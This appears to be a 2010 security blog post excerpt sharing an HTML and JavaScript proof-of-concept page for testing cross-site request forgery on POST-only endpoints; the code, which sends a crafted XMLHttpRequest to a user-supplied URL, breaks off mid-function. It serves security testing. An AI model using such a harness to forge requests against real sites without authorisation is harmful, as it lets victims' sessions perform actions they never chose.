Posts Tagged ‘xsrf’

XSRF POST Testing

Wednesday, February 3rd, 2010 by webstersprodigy

Building a POC for an XSRF that only allows POST is not as straightforward as for GET. I use something like the following for situations like that.

    <html>
    <head></head>
    <body>
    <script>
    function poststuff() {
        var site = document.getElementById("posturl").value;
        var post_data = document.getElementById("postparam").value;
        alert("site: " + site);
        alert("pdata: " + post_data);
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", site, true);
        xmlhttp.onreadystatechange = function [...]

